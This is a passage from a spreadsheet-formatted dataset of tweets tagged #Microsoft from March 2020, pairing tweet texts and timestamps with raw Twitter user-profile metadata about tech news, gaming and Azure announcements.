    <t>{'id': 254719064, 'id_str': '254719064', 'name': 'Montague Lovecraft', 'screen_name': 'TheElfishGene', 'location': 'Bristol, England', 'description': 'An officer and a gentleman!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 68, 'friends_count': 226, 'listed_count': 2, 'created_at': 'Sat Feb 19 21:28:30 +0000 2011', 'favourites_count': 425, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 621,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True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1376260272/Coop_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1376260272/Coop_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/254719064/1431026894', 'profile_link_color': 'DD2E44',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</si>
  <si>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18:11:15 +0000 2020</t>
  </si>
  <si>
    <t>Experienced the HoloLens 2 this morning... and the US Army have ordered 100k+ of these things #technologist #technologynews #technologyinsights #advisor #policy #technology #ar #augmentedreality #microsoft #hololens #hololens2 https://t.co/3oHk1dSxFf</t>
  </si>
  <si>
    <t>{'id': 2236655706, 'id_str': '2236655706', 'name': 'WA_Meetup', 'screen_name': 'wa_meetup', 'location': 'Warrington', 'description': "We're a Meetup group for the community of anyone wanting to, interested in or already working within the digital space", 'url': 'https://t.co/6qjXJPkP76', 'entities': {'url': {'urls': [{'url': 'https://t.co/6qjXJPkP76', 'expanded_url': 'http://www.meetup.com/wa-meetup/', 'display_url': 'meetup.com/wa-meetup/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 424, 'friends_count': 288, 'listed_count': 26, 'created_at': 'Sun Dec 08 22:24:07 +0000 2013', 'favourites_count': 28, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 252,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'http://pbs.twimg.com/profile_images/729074641017438208/XDx7MEHf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/729074641017438208/XDx7MEHf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2236655706/1462660034', 'profile_link_color': 'C0143E',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</si>
  <si>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18:09:54 +0000 2020</t>
  </si>
  <si>
    <t>John Hoegger explains how his team at Microsoft came to be 50% women.
https://t.co/3I2Yy5Mur8
@Microsoft @SoniaTagare @theCUBE #WiDS2020 #theCUBE #Microsoft #EnterpriseTech #WomeninTech #datascience https://t.co/Xg4Ft8krE9</t>
  </si>
  <si>
    <t>Tue Mar 03 18:09:14 +0000 2020</t>
  </si>
  <si>
    <t>#Papercut #print client issues on fresh install of #Windows as a virtual machine. https://t.co/PL1KfsQkbd #hyperv #microsoft #p2v #virtualisation #mvp #mvpbuzz #printing #windowsx</t>
  </si>
  <si>
    <t>{'id': 14950582, 'id_str': '14950582', 'name': 'trevortye', 'screen_name': 'trevortye', 'location': 'Edmonton', 'description': 'Computer Geek/DevOps guy. Microsoft MVP in Cloud and Data Centre.  hardware, software, Windows, Mac &amp; Linux; I do it all.  Any questions please ask.', 'url': 'http://t.co/j0gwzAqls1', 'entities': {'url': {'urls': [{'url': 'http://t.co/j0gwzAqls1', 'expanded_url': 'http://www.optionkey.ca', 'display_url': 'optionkey.ca', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 926, 'friends_count': 310, 'listed_count': 119, 'created_at': 'Fri May 30 02:05:50 +0000 2008', 'favourites_count': 861, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 27334, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '999999', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/841872457938153472/JB6rmjjJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/841872457938153472/JB6rmjjJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14950582/1470156116', 'profile_link_color': '0066CC', 'profile_sidebar_border_color': '0051E6', 'profile_sidebar_fill_color': 'C7C7C7', 'profile_text_color': '3B3B3B', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 18:09:08 +0000 2020</t>
  </si>
  <si>
    <t>"Can expect substantial increase in revenue for Amazon in this quarter due to the situation created by the Coronavirus."
.
.
.
#amazon #amazonstock #microsoft #growthstocks #amazonprimemember https://t.co/zynPqFzhO9</t>
  </si>
  <si>
    <t>{'id': 1234445167551225856, 'id_str': '1234445167551225856', 'name': 'Intelligent_investorss', 'screen_name': 'investoanalysis', 'location': '', 'description': 'U.SðŸ‡ºðŸ‡¸&amp;IndianðŸ‡®ðŸ‡³Stock Analyst\nintelligent_investorss (Instagram)', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Mon Mar 02 11:47:28 +0000 2020', 'favourites_count': 7,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'http://pbs.twimg.com/profile_images/1234466059765284865/xh_Foj2O_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234466059765284865/xh_Foj2O_normal.jpg',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</si>
  <si>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18:06:55 +0000 2020</t>
  </si>
  <si>
    <t>#Papercut #print client issues on fresh install of #Windows as a virtual machine.  #hyperv #microsoft #p2v #virtualisation #mvp #mvpbuzz #printing https://t.co/DGyIBeu7X9</t>
  </si>
  <si>
    <t>Tue Mar 03 18:06:02 +0000 2020</t>
  </si>
  <si>
    <t>I saved someone from being assassinated again.
Remember to follow @drhemotoxin for more clips
#games #Cod #modernwarfare #xb1 #Codclips #rainbowsixsiege #r6 #apex #gaming #Gamer #callofduty #Callofdutymodernwarfare #Rainbow #Siege #Microsoft #XboxOne #Xbox #Console https://t.co/4bn37vgjjC</t>
  </si>
  <si>
    <t>{'id': 757321328420618241, 'id_str': '757321328420618241', 'name': 'Drhemotoxin', 'screen_name': 'Drhemotoxin', 'location': 'London, England, United Kingdo', 'description': 'ðŸ‘¤Call of duty streamer \nðŸ‘¥Twitch affiliate | business email: d.gibson2799@gmail.com | https://t.co/p7UvuGzA3t \n| Partnered W/ @ArtesianBuilds', 'url': 'https://t.co/xTFeOI4cg2', 'entities': {'url': {'urls': [{'url': 'https://t.co/xTFeOI4cg2', 'expanded_url': 'https://www.twitch.tv/drhemotoxin', 'display_url': 'twitch.tv/drhemotoxin', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/p7UvuGzA3t', 'expanded_url': 'http://Instagram.com/drhemotoxin/', 'display_url': 'Instagram.com/drhemotoxin/', 'indices': [85, 108]}]}}, 'protected': False, 'followers_count': 126, 'friends_count': 79, 'listed_count': 0, 'created_at': 'Sun Jul 24 21:07:29 +0000 2016', 'favourites_count': 2659, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1647, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1211030467425771522/8UUkzqPX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1211030467425771522/8UUkzqPX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/757321328420618241/1566854422',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</si>
  <si>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18:04:37 +0000 2020</t>
  </si>
  <si>
    <t>Finally have :-) #Microsoft #ergonomic #sculpt  https://t.co/o94Tej6CTK</t>
  </si>
  <si>
    <t>{'id': 2394308544, 'id_str': '2394308544', 'name': 'MichaÅ‚ MizioÅ‚ek-Fied', 'screen_name': 'michalfied', 'location': 'Warszawa', 'description': 'Fascinated by #Microsoft technology.  Interested in topics related to #azure #office365 #activedirectory #Windows #WindowsServer', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 19, 'friends_count': 67, 'listed_count': 3, 'created_at': 'Mon Mar 17 12:24:42 +0000 2014', 'favourites_count': 979, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 676,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'http://pbs.twimg.com/profile_images/1180379184021016576/K0AcIKOd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1180379184021016576/K0AcIKOd_normal.jpg',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</si>
  <si>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18:03:30 +0000 2020</t>
  </si>
  <si>
    <t>via #Citrix Blogs: "Webinar: LEAD with custom microapp integrations in Citrix Workspace: " https://t.co/HC6GZDKeMF
.
.
.
#blog #virtualization #cloudcomputing #cloud #security #microsoft #azure #citrix #citrixishow</t>
  </si>
  <si>
    <t>Tue Mar 03 18:02:26 +0000 2020</t>
  </si>
  <si>
    <t>Wanna build a website? Try Microsoft Sway! https://t.co/Ow8SLnvs0C @Microsoft @Office365 #sway #website #build #microsoft #techtuesday https://t.co/yOnCV5Mwo4</t>
  </si>
  <si>
    <t>{'id': 1109214230878666753, 'id_str': '1109214230878666753', 'name': 'Kiasi TechSolutions', 'screen_name': 'KiasiT', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 13, 'friends_count': 358, 'listed_count': 0, 'created_at': 'Fri Mar 22 22:04:15 +0000 2019', 'favourites_count': 380, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 400, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1109243972864499713/0aH2uQay_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1109243972864499713/0aH2uQay_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1109214230878666753/1553299346',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</si>
  <si>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18:02:20 +0000 2020</t>
  </si>
  <si>
    <t>@system76 Visual Studio Code... All day, Every day... #vscode #Microsoft #VisualStudio.</t>
  </si>
  <si>
    <t>{'id': 1073135253856894976, 'id_str': '1073135253856894976', 'name': 'Willis Ivali', 'screen_name': 'mrwillisivali', 'location': 'Nairobi, Kenya', 'description': "Software Engineer | God's Child | Gamer", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 119, 'friends_count': 418, 'listed_count': 1, 'created_at': 'Thu Dec 13 08:39:17 +0000 2018', 'favourites_count': 1615, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3055,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'http://pbs.twimg.com/profile_images/1196085794836041728/6sFnn6aj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1196085794836041728/6sFnn6aj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1073135253856894976/1564509465', 'profile_link_color': '660066',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</si>
  <si>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18:01:59 +0000 2020</t>
  </si>
  <si>
    <t>Azure IoT Hub and DPS to only support #TLS 1.2 on July 1, 2020
 #Microsoft #AzureFamily
https://t.co/rra7SBTCfC</t>
  </si>
  <si>
    <t>Tue Mar 03 18:01:19 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #MVP #summit is going #virtual after #coronavirus threat
https://t.co/QCOF48jZ7Q</t>
  </si>
  <si>
    <t>Tue Mar 03 18:00:51 +0000 2020</t>
  </si>
  <si>
    <t>Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC https://t.co/Yl9LwBRKiL #Azure #Microsoft #VirtualMachines</t>
  </si>
  <si>
    <t>Tue Mar 03 18:00:38 +0000 2020</t>
  </si>
  <si>
    <t>Better Together' T-Shirt Design Contest
https://t.co/CGiyVHjuNV
#Microsoft #PowerBI #DataAnalytics</t>
  </si>
  <si>
    <t>Tue Mar 03 18:00:30 +0000 2020</t>
  </si>
  <si>
    <t>The #1 MCT-Train-the-Trainer Online  Master Training by PrepMasters USA  Certified by #Microsoft  Increase your earnings  potential  GET Certified  https://t.co/cVkaPu7HDg https://t.co/cwfVVvAfSC</t>
  </si>
  <si>
    <t>Tue Mar 03 18:00:17 +0000 2020</t>
  </si>
  <si>
    <t>Did you know? New files uploaded to #Office365 connected #Yammer communities are now stored in #SharePoint. https://t.co/UusiWlJpdj
#microsoft #microsoft365 https://t.co/kuLnsZIIgg</t>
  </si>
  <si>
    <t>Tue Mar 03 18:00:13 +0000 2020</t>
  </si>
  <si>
    <t>Is that gamer Eric Cartman?
#mw #mw2 #mw3 #modernwarfare #microsoft #xbox #xbox1 #xb1 #xboxone #xboxones #xboxonex #xboxgamer #xboxlive #cod #codww2 #callofduty #callofdutyww2 #callofdutymodernwarfare #blackops... https://t.co/mI54kPkKsA</t>
  </si>
  <si>
    <t>Tue Mar 03 18:00:07 +0000 2020</t>
  </si>
  <si>
    <t>The modern #workplace is a mobile workplace and with this expanded workplace comes higher #cyberthreats. 
Find out why #mobile threat defense should be a part of your #cyberdefense strategy: https://t.co/e1kb1hTIJJ
#security #Microsoft #threatintelligence https://t.co/a7TnJidD4K</t>
  </si>
  <si>
    <t>Tue Mar 03 17:58:08 +0000 2020</t>
  </si>
  <si>
    <t>Heard today that #Microsoft has declared #HIMSS20 a "Handshake Free Meeting". We might see a lot of interesting greetings in that case...what would you do? https://t.co/Uqv4Uq6pDv</t>
  </si>
  <si>
    <t>Tue Mar 03 17:57:18 +0000 2020</t>
  </si>
  <si>
    <t>Smart contract language DAML now works with Ethereum compatible Hyperledger Besu - Ledger Insights - enterprise blockchain https://t.co/5ns8ORXSgq #microsoft</t>
  </si>
  <si>
    <t>{'id': 62493927, 'id_str': '62493927', 'name': 'Ron Felice', 'screen_name': 'r_felice', 'location': 'Milky Way Galaxy', 'description': 'MBSE, MDD, Automotive, Connected Vehicle #v2x and #ISO26262 SME. ML/AI Learner!  Proud father of 2 humans and a canine. All of this malarkey is my own opinion!', 'url': 'https://t.co/AhxxNxFL6c', 'entities': {'url': {'urls': [{'url': 'https://t.co/AhxxNxFL6c', 'expanded_url': 'http://linkedin.com/in/the-ron-felice', 'display_url': 'linkedin.com/in/the-ron-felâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 762, 'friends_count': 575, 'listed_count': 138, 'created_at': 'Mon Aug 03 11:32:53 +0000 2009', 'favourites_count': 3015, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 36140,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'http://pbs.twimg.com/profile_images/454100368129933312/-Eiykj9C_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/454100368129933312/-Eiykj9C_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/62493927/1399676940', 'profile_link_color': '0022FF', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '000000', 'profile_text_color': 'FA8459', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 17:57:17 +0000 2020</t>
  </si>
  <si>
    <t>Azure IoT Introduces seamless integration with Cisco IoT  https://t.co/uQUGa6Fs1n #Microsoft #Azure</t>
  </si>
  <si>
    <t>Tue Mar 03 17:57:08 +0000 2020</t>
  </si>
  <si>
    <t>Learn how YOU can build a Serverless GraphQL API on top of a Microservice architecture, part I by @chris_noring  via @ThePracticalDev    https://t.co/POgc15sLvs 
#serverless #azure #microsoft https://t.co/F2iBIAIA9x</t>
  </si>
  <si>
    <t>{'id': 1051867781979926528, 'id_str': '1051867781979926528', 'name': 'warpJS', 'screen_name': 'WeWarpJS', 'location': 'Rennes, France', 'description': 'Serverless: the next generation ðŸš€\nA new serverless approach to get your app from scratch to lives in minutes âŒš\n#serverless #javascript #nodejs', 'url': 'https://t.co/cEx9SW6Diq', 'entities': {'url': {'urls': [{'url': 'https://t.co/cEx9SW6Diq', 'expanded_url': 'http://warpjs.com', 'display_url': 'warpjs.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 131, 'friends_count': 424, 'listed_count': 6, 'created_at': 'Mon Oct 15 16:09:56 +0000 2018', 'favourites_count': 521, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 479,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'http://pbs.twimg.com/profile_images/1217109202759569409/fielyacz_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217109202759569409/fielyacz_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1051867781979926528/1579600616',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</si>
  <si>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17:57:07 +0000 2020</t>
  </si>
  <si>
    <t>Become a security focused CSP with Microsoft 365 Business https://t.co/y23x18wPy0 #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 17:56:54 +0000 2020</t>
  </si>
  <si>
    <t>If you dont create culture, then you create nothing - @satyanadella #Microsoft #culture #satya https://t.co/jPdedTAqs9</t>
  </si>
  <si>
    <t>{'id': 1233057783458750471, 'id_str': '1233057783458750471', 'name': 'Andrei Nutesch', 'screen_name': 'ANutesch', 'location': 'KÃ¶ln, Deutschland', 'description': 'Spontan, leicht zu inspirieren und immer mit dem Willen, GlÃ¼ck und SpaÃŸ zu verbreiten - Director BD und Marketing Lead bei @iteracon', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 24, 'friends_count': 170, 'listed_count': 0, 'created_at': 'Thu Feb 27 15:54:29 +0000 2020', 'favourites_count': 98, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 31, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1233059357329371136/tGUYtqRc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233059357329371136/tGUYtqRc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1233057783458750471/1582820105',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</si>
  <si>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17:55:09 +0000 2020</t>
  </si>
  <si>
    <t>Tue Mar 03 17:53:16 +0000 2020</t>
  </si>
  <si>
    <t>Refund scammers linked to iYogi - (253) 642-0553 - #Scammer #Scambait #TSU #Refund #Scam #Info #Information #Windows #Microsoft - https://t.co/0s1Du7zIS8</t>
  </si>
  <si>
    <t>Tue Mar 03 17:52:59 +0000 2020</t>
  </si>
  <si>
    <t>@BLRSmartCity @BBMPCOMM @SmartCities_HUA @KarnatakaVarthe @Karnataka_DIPR @BBMP_MAYOR @MoHUA_India @Secretary_MoHUA Excellent initiative! Must needed. Please ensure partnership with Science Ministry and big institutes like #IISc,CV Raman Institute of physics etc. Get private players like #Microsoft, #IBM, #Google to put in their best. Treat science as science and don't politicize it please.</t>
  </si>
  <si>
    <t>{'id': 1119633562528096257, 'id_str': '1119633562528096257', 'name': 'Urban Chaprasi', 'screen_name': 'UrbanChaprasi', 'location': 'India', 'description': 'Citizen of India, Proud Indian, Urban dweller, pained by basic civic aminities, tax payer, middle class, an urban chaprasi, follows rules. All views personal.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 67, 'listed_count': 0, 'created_at': 'Sat Apr 20 16:06:57 +0000 2019', 'favourites_count': 15, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 152, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1119636808348909568/nStXmAMr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1119636808348909568/nStXmAMr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1119633562528096257/1555777748',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</si>
  <si>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17:50:44 +0000 2020</t>
  </si>
  <si>
    <t>3 new repositories created in Microsoft
- 1 Manageability_MAMA
- 2 babel-unminify-plugin
- 3 dtmi
 #GitHub #OpenSource #microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 17:48:45 +0000 2020</t>
  </si>
  <si>
    <t>Re-Imagine Your Business With iLink's Digital Transformation Services. https://t.co/JgIzGZ5kOV #ilinksystems #ilinkdifference #digitaltransformation #cto #digitaltechnology #technology #digital #business #businesstransformation #microsoft #businesschange #change https://t.co/6yYxlTrJMB</t>
  </si>
  <si>
    <t>Tue Mar 03 17:46:42 +0000 2020</t>
  </si>
  <si>
    <t>#quantumcomputing #honeywell made break through with twice number of #qubits 64- https://t.co/D9wFtD3XtI #IBM #Google #Microsoft hope they will open use to public https://t.co/9PPjJW5UXJ</t>
  </si>
  <si>
    <t>{'id': 66675669, 'id_str': '66675669', 'name': '64BitDev âŒ¨ï¸', 'screen_name': '64BitDev', 'location': 'PL, EU', 'description': 'cook both in-house and @work ðŸ™ðŸŒ¶ï¸ðŸ¥˜ðŸ¥Ÿ', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 299, 'friends_count': 538, 'listed_count': 17, 'created_at': 'Tue Aug 18 13:06:56 +0000 2009', 'favourites_count': 405, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1248,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'http://pbs.twimg.com/profile_images/1147838359072645120/sA43GB_C_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1147838359072645120/sA43GB_C_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/66675669/1564942157', 'profile_link_color': '2C2C2C',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</si>
  <si>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17:46:22 +0000 2020</t>
  </si>
  <si>
    <t>I wish console streaming wasnt so limited on what you can do.. I hope @Xbox and @Twitch have options like @OBSProject for #XboxSeriesX #gamer #Microsoft #Twitch</t>
  </si>
  <si>
    <t>{'id': 737967350, 'id_str': '737967350', 'name': 'Joey', 'screen_name': 'jlh_019', 'location': 'Delaware, USA', 'description': 'family. orioles. niners. xbox. hip-hop. comics.', 'url': 'https://t.co/pFtKY0x5oH', 'entities': {'url': {'urls': [{'url': 'https://t.co/pFtKY0x5oH', 'expanded_url': 'http://twitch.tv/himbaw', 'display_url': 'twitch.tv/himbaw', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 110, 'friends_count': 109, 'listed_count': 2, 'created_at': 'Sun Aug 05 04:15:17 +0000 2012', 'favourites_count': 3226, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2195,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'http://pbs.twimg.com/profile_images/1149139149636689920/fUPnsnt2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1149139149636689920/fUPnsnt2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/737967350/1580942045',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</si>
  <si>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17:46:03 +0000 2020</t>
  </si>
  <si>
    <t>Rumor suggests Microsoft could show off Xbox Series X gameplay later this week #XboxSeriesX #AMD #Microsoft https://t.co/nM1qy2LRj2 https://t.co/JQWJNo80vf</t>
  </si>
  <si>
    <t>Tue Mar 03 17:45:57 +0000 2020</t>
  </si>
  <si>
    <t>Re-Imagine Your Business With iLink's Digital Transformation Services. https://t.co/PjsAYG1rcI #ilinksystems #ilinkdifference #digitaltransformation #cto #digitaltechnology #technology #digital #business #businesstransformation #microsoft #businesschange #change https://t.co/Nb7Zxtv1Qj</t>
  </si>
  <si>
    <t>Tue Mar 03 17:44:41 +0000 2020</t>
  </si>
  <si>
    <t>A superb panel today at #Microsofts Data Science &amp;amp; Law Forum with European Commission Cabinet Member @stengwe, Natasha Crampton Microsofts Chief Responsible AI Officer &amp;amp; Lisa Dyer Director of Policy @PartnershipAI &amp;gt;&amp;gt; valuable guidance on the future of #AI regulation #MSFTEU https://t.co/E0Kp8Rbtvt</t>
  </si>
  <si>
    <t>{'id': 233103411, 'id_str': '233103411', 'name': 'Nicholas McQuire', 'screen_name': 'nickmcquire', 'location': 'London, United Kingdom', 'description': 'Analyst, IT Advisor and SVP/Head of Enterprise Research at @CCSInsight. Board Member of @CMDSP. Focus on AI, cloud, security and digital workplace strategies.', 'url': 'https://t.co/5uFsYQ38Kv', 'entities': {'url': {'urls': [{'url': 'https://t.co/5uFsYQ38Kv', 'expanded_url': 'https://www.linkedin.com/in/nicholasmcquire', 'display_url': 'linkedin.com/in/nicholasmcqâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8434, 'friends_count': 927, 'listed_count': 299, 'created_at': 'Sun Jan 02 08:30:06 +0000 2011', 'favourites_count': 1822, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6411,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'http://pbs.twimg.com/profile_images/1072435506061983744/-LJLEq6s_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1072435506061983744/-LJLEq6s_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/233103411/1575650965',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</si>
  <si>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17:40:02 +0000 2020</t>
  </si>
  <si>
    <t>Indian student team 2nd in Microsoft's Asia competition #ImagineCupAsia #Microsoft #RFID #AsiaCompetition #NewDelhi https://t.co/KoyzEaTHbj</t>
  </si>
  <si>
    <t>{'id': 1874798778, 'id_str': '1874798778', 'name': 'The Hans India', 'screen_name': 'TheHansIndiaWeb', 'location': 'Hyderabad', 'description': 'The Hans India is a leading English news paper and is published from #Telangana #AndhraPradesh and #NewDelhi', 'url': 'https://t.co/lyOzm0wKU9', 'entities': {'url': {'urls': [{'url': 'https://t.co/lyOzm0wKU9', 'expanded_url': 'https://www.thehansindia.com', 'display_url': 'thehansindia.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4674, 'friends_count': 1632, 'listed_count': 275, 'created_at': 'Tue Sep 17 09:26:43 +0000 2013', 'favourites_count': 44, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 190616,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'http://pbs.twimg.com/profile_images/1193259214480773128/FVfjPYIu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1193259214480773128/FVfjPYIu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1874798778/1577298390', 'profile_link_color': '981CEB',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</si>
  <si>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17:39:10 +0000 2020</t>
  </si>
  <si>
    <t>Azure IoT Introduces seamless integration with Cisco IoT: https://t.co/CMVWscLN1V #Azure #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 17:39:01 +0000 2020</t>
  </si>
  <si>
    <t>Learn how you can benefit from using #Microsoft and #Cisco tools at work and improve productivity each and every day. #MicrosoftTeams #CiscoWebex #Webex https://t.co/Gry0aUdrxp https://t.co/XwY2sfMvig</t>
  </si>
  <si>
    <t>{'id': 1372431026, 'id_str': '1372431026', 'name': 'Anthony Brown', 'screen_name': 'ajbrown1906', 'location': 'Dallas, TX', 'description': 'Great minds must be ready not only to take opportunities, but to make them.', 'url': 'https://t.co/oQGreJB7ZZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/oQGreJB7ZZ', 'expanded_url': 'http://www.carouselindustires.com', 'display_url': 'carouselindustires.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 291, 'friends_count': 1820, 'listed_count': 12, 'created_at': 'Mon Apr 22 15:43:41 +0000 2013', 'favourites_count': 277, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7090,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'http://pbs.twimg.com/profile_images/378800000110253056/58c4ff7730e075690811443e1e3fb6d4_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000110253056/58c4ff7730e075690811443e1e3fb6d4_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1372431026/1583173381',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</si>
  <si>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17:37:13 +0000 2020</t>
  </si>
  <si>
    <t>Want to help your teachers save time and increase classroom efficiency? Watch this video and share the insightful #Windows10 shortcuts.
#EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/413dkPddsp</t>
  </si>
  <si>
    <t>{'id': 1090808723440775169, 'id_str': '1090808723440775169', 'name': 'Treasure Valley Solutions', 'screen_name': 'tvalleysolution', 'location': 'Meridian, ID', 'description': 'We provide affordable Smart Home Solutions, Custom Web Applications and General IT Services in the Treasure Valley', 'url': 'https://t.co/Kf19MVjZSJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/Kf19MVjZSJ', 'expanded_url': 'http://treasurevalleysolutions.com', 'display_url': 'treasurevalleysolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 14, 'friends_count': 77, 'listed_count': 0, 'created_at': 'Thu Jan 31 03:07:20 +0000 2019', 'favourites_count': 113, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 604,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'http://pbs.twimg.com/profile_images/1090808834891833344/PXm0yirn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1090808834891833344/PXm0yirn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1090808723440775169/1550114710',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</si>
  <si>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17:35:52 +0000 2020</t>
  </si>
  <si>
    <t>You can now make sick beats in #Microsoft #Excel https://t.co/rqqPIHIcib przez @Verge</t>
  </si>
  <si>
